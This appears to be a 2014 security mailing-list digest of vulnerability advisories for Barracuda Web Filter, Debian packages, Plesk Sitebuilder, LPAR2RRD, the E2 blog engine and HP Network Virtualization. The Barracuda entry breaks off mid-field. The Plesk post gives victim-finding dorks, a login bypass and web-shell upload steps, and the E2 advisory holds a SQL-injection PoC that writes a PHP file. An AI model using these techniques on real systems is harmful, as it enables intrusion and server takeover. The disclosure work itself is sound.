Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass Persistent Vulnerability
Document Title: === Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass Persistent Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1101 Barracuda Networks Security ID (BNSEC): BNSEC-2361 http://www.barracuda.com/kb?id=50160013m4O Solution #6619 BNSEC-02361: Authenticated persistent IVE in Barracuda Web Filter v6.0.1 Release Date: = 2014-07-22 Vulnerability Laboratory ID (VL-ID): 1101 Common Vulnerability Scoring System: 3.7 Product Service Introduction: === The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more costly staff time lost repairing infected computers. ( Copy of the Vendor Homepage: https://www.barracuda.com/products/webfilter ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities and a filter bypass issue in the Barracuda Networks WebFilter 610-Vx appliance web-application. Vulnerability Disclosure Timeline: == 2013-12-27: Researcher Notification Coordination (Benjamin Kunz Mejri) 2013-12-28: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2014-01-19: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) 2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow] 2014-07-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Barracuda Networks Product: WebFilter Appliance Web-Application 6.0.1.009 - X210 X310 X410 X510 X610 X710 X810 X910 X1010 Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: Multiple persistent input validation web vulnerabilities and a filter bypass has been discovered in the Barracuda Networks WebFilter Model 610Vx appliance web-application. The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected service, module or function. The vulnerability are located in the `domain names`, `grid__data in grid_columns` and `x-grid3-cell-inner x-grid3-col-name` values of the `Basic Reports` module. Remote attackers are able to inject own script code as domain name to execute the context in the show advanced options menu listing (+plus). The attack vector is persistent located on the application-side and the request method to inject is POST. To bypass the invalid domain exception the attacker first need to include a valid domain, in the second step he change the domain name value by a session tamper. Reason behind the technique is that the input field validation is separatly done to the request method validation. The restriction of the invalid input field check can be bypassed by usage of a session tamper to change the input field context live after the first direct input encode of the web filter application. Another problem is located in the same module which affects the buttom name item listing. The security risk of the persistent input validation web vulnerability and fitler bypass is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged web-application account. Successful exploitation of the vulnerability results in session hijacking (customers), persistent phishing, persistent external redirects or persistent manipulation of connected or affected module context. Request Method(s): [+] GET [+] POST Vulnerable Module(s): [+] Basic Reports Advanced Options Show Advanced Options Vulnerable Input Field(s): [+] Add Domain Vulnerable Parameter(s): [+] domain name [+] grid__data in grid_columns [+] x-grid3-cell-inner x-grid3-col-name Affected Module(s): [+] Reports Module Index [+] Reports Module Advanced Options List [+] Buttom Name Item List Affected Version(s):
[SECURITY] [DSA 2984-1] acpi-support security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - Debian Security Advisory DSA-2984-1 secur...@debian.org http://www.debian.org/security/ Luciano Bello July 22, 2014 http://www.debian.org/security/faq - - Package: acpi-support CVE ID : CVE-2014-1419 CESG discovered a root escalation flaw in the acpi-support package. An unprivileged user can inject the DBUS_SESSION_BUS_ADDRESS environment variable to run arbitrary commands as root user via the policy-funcs script. For the stable distribution (wheezy), this problem has been fixed in version 0.140-5+deb7u1. For the testing distribution (jessie), this problem has been fixed in version 0.142-2. For the unstable distribution (sid), this problem has been fixed in version 0.142-2. We recommend that you upgrade your acpi-support packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCAAGBQJTzp77AAoJEG7C3vaP/jd0zssP/1WfL6Iq0elSTlAmqX8ZXQh2 0O8PFodYLSq/02clDQjGPAfxjwG2LWuXUlvt9/vn9G//sOKIW4SrGmoJRU89zwpk uPPV51yLRaK4dv+A5binwFgCt+57vz3Of/8ung2JFEXBhWGh8fGqnRXpmCYM2BlI 70GHA2xLCNXxDd+aYClz7zXo0yPuTUhFWoL6HF+5IGoAJcn93t2N/UPPJ4Q7TM2f cGOISy1WGicas8ytOpY9dRVBw314yEliYCMbJKJBcbnfawMAg2XLjbx3Kx9X7DEz 6wsW7TmgiyiDx44iqItdyc5hX3AqtbA1IIqdnBuKfzhxDBmtt7Ku4e/C5VoDIGqq cs6Tsp11ztslsxoxi1B2nvJbGPAQt9CgiFRBdCzkawC/xD0IBCjEpVyqyCdr+TLe sd1mGny3qk+j88xD7rgKK2e/p7ttce+CRsltH/TQHjGohsj/Z6tK9d6pzTNpJsUQ 9sau879yXv7X+s/x5v9QRpDuXgAi56yOpdWFU/UJuS8+Rg7OlakepWAheTrKcPl1 gboUO3xzuBgKYQDiNU7w/j3JKvFue+iIl9c+CHo8qriufR62hdwnpubM3qQurExG rD0as7VIqqMPyOEaxn2Y8lZvCzkworCr2wPbLzSIWtfUM73zkcGMIpIwLw9OkkEV 8x4tW7dLSAktXPZAlzxZ =leQs -END PGP SIGNATURE-
[SECURITY] [DSA 2985-1] mysql-5.5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2985-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso July 22, 2014 http://www.debian.org/security/faq - - Package: mysql-5.5 CVE ID : CVE-2014-2494 CVE-2014-4207 CVE-2014-4258 CVE-2014-4260 Debian Bug : 754941 Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.38. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-38.html http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html For the stable distribution (wheezy), these problems have been fixed in version 5.5.38-0+wheezy1. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your mysql-5.5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTzrRNAAoJEAVMuPMTQ89EixUP/2cqn0LO3KluXxfLubv+bryD TwNguwPW2xc3UXNQb37gfJQn4kJh8dJm5tioh+VtvnN9a+kLiqCBroWL02Zx/Uz1 1pCdpOETMImdpTDprot3uyBEaOE17wit3NVA/zNREK+tA0LMnhog7bcbazVRBvZi VAEJ7wM8uelnG/tS+tM7QQcLcWmEYVJOULTdOqDoIut3e8nM2E72+x4Sd1t1gq9w lDy5s05OAEUuk5Cnrn11iApA/EyaT44hwai5dkc9wY3GFP5CdRuRrcSjHbPk68TI GXOSsIThD0T5aqcaYfCDuZb+HcEXx2TX1Gq8Kfr4sAbWu4Yp6iKtLDXzuSVJnM20 BN31TndDONsuG60fM8itFp2qeIcZSjUCXTSSRVIZ9RKPya9ym3bft33bkXqY+ttx sza1eXUIOAMLuXaQdVld2vyvqyDpjBOocG6tInSjzqE2lVAelo/O4SaiWTuo/eve FzeBOAUmTgbJhM+MZ+TBcgDcFrwxb5FTFFx+fKO5AiBfopR5iM1wKffI/60JT6/U fuuAzjjGmQVPi6bARsmGWOl5bdL7iIcIAHBmBAzDONgaJgjxamFW7uyN9U8q+iLP OqlZXIkczIPMYVjxYKqHtepKCSoECPlnbTxMm0oLwCfPN5mzIQUyY2LhPZ+qOTsh 5qf0a0mQ3NwSSfOIh3JG =Cpew -END PGP SIGNATURE-
Multiple Vulnerabilities in Parallels� Plesk Sitebuilder
#+ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:© Copyright 2004-2007 SWsoft. ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download # 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard - 2-uploading shell via Live HTTP Headers(version 2004-2007) Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name=ctl00$ContentStep$FileUploadLogo; filename=shell.asp.gif\r\n] to [Content-Disposition: form-data; name=ctl00$ContentStep$FileUploadLogo; filename=shell.asp.asp\r\n] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp - 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename createdp=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790bp=web.config - 4-xss(all version) you can inject xss code in all module of this page http://sitebuilder.cp.collaborationhost.net/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto Add New Category and insert xss code in Category description and Enjoy :) - 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx # [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ # [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #
[oCERT-2014-005] LPAR2RRD input sanitization errors
#2014-005 LPAR2RRD input sanitization errors Description: LPAR2RRD is a performance monitoring and capacity planning software for IBM Power Systems. LPAR2RRD generates historical, future trends and nearly real-time CPU utilization graphs of LPAR's and shared CPU usage. Insufficient input sanitization on the parameters passed to the application web gui leads to arbitrary command injection on the LPAR2RRD application server. Affected version: LPAR2RRD = 4.53, = 3.5 Fixed version: LPAR2RRD 4.53 Credit: vulnerability report and PoC code received from Jürgen Bilberger juergen.bilberger AT daimler.com. CVE: CVE-2014-4981 (version = 3.5), CVE-2014-4982 (version = 4.53) Timeline: 2014-07-08: vulnerability report received 2014-07-08: contacted LPAR2RRD maintainers 2014-07-20: patch provided by maintainers, assigned CVEs 2010-07-22: contacted affected vendors 2010-07-23: advisory release References: http://www.lpar2rrd.com Permalink: http://www.ocert.org/advisories/ocert-2014-005.html -- Daniele Bianco Open Source Computer Security Incident Response Team dan...@ocert.org http://www.ocert.org GPG Key 0x9544A497 GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D 4AC5 AE75 822E 9544 A497
SQL Injection in Е2
Advisory ID: HTB23222 Product: Е2 Vendor: Ilya Birman Vulnerable Version(s): v2844 and probably prior Tested Version: v2844 Advisory Publication: July 2, 2014 [without technical details] Vendor Notification: July 2, 2014 Vendor Patch: July 3, 2014 Public Disclosure: July 23, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-4736 Risk Level: High CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in Е2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application. 1) SQL Injection in Е2: CVE-2014-4736 The vlnerability exists due to insufficient sanitization of input data passed via the note-id HTTP POST parameter to /@actions/comment-process URI. A remote attacker can send a specially crafted HTTP POST request, inject and execute arbitrary SQL commands in application’s database. Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in database and gain complete access to the web site. PoC code below will create a PHP file /var/www/file.php, containing phpinfo() call (if the filesystem permissions and MySQL configuration allow it): form action=http://[host]/@actions/comment-process; method=post name=main input type=hidden name=already-subscribed value= input type=hidden name=comment-id value=new input type=hidden name=elton-john value=1 input type=hidden name=email value=m...@mail.com input type=hidden name=from value= input type=hidden name=name value=name input type=hidden name=subscribe value=on input type=hidden name=text value=1 input type=hidden name=note-id value=' UNION SELECT '? phpinfo(); ?',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2 input type=submit id=btn /form --- Solution: Update to Е2 version v2845 More Information: http://blogengine.ru/download/ --- References: [1] High-Tech Bridge Advisory HTB23222 - https://www.htbridge.com/advisory/HTB23222 - SQL Injection in Е2. [2] Е2 - http://blogengine.ru/ - E2 is a perfect engine for blogging. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
[security bulletin] HPSBMU03073 rev.1 - HP Network Virtualization, Remote Execution of Code, Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04374202 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04374202 Version: 1 HPSBMU03073 rev.1 - HP Network Virtualization, Remote Execution of Code, Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-22 Last Updated: 2014-07-22 Potential Security Impact: Remote execution of code, disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Network Vitalization. The vulnerability could be exploited remotely to allow execution of code and disclosure of information. References: CVE-2014-2625 (ZDI-CAN-2023, SSRT101358) CVE-2014-2626 (ZDI-CAN-2024, SSRT101359) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Network Virtualization v8.6 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-2625(AV:N/AC:L/Au:N/C:C/I:P/A:N) 8.5 CVE-2014-2626(AV:N/AC:L/Au:N/C:C/I:C/A:N) 9.4 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod working with HP's Zero Day Initiative for reporting CVE-2014-2625 and CVE-2014-2626 to security-al...@hp.com. RESOLUTION HP has provided the following patch to resolve the vulnerability: Shunra Network Virtualization for HP Load Generator v8.61 Patch 1 The patch is available at HP Software Support Online (SSO) here: http://support.openview.hp.com/selfsolve/document/LID/NV_1 HISTORY Version:1 (rev.1) - 22 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlPO3j4ACgkQ4B86/C0qfVlIAQCfTEiRbCZSSu8QogE4O5kBRF2G 9fAAn19N7zwMr9smXEZx225xyN1283M5 =qVyP -END PGP SIGNATURE-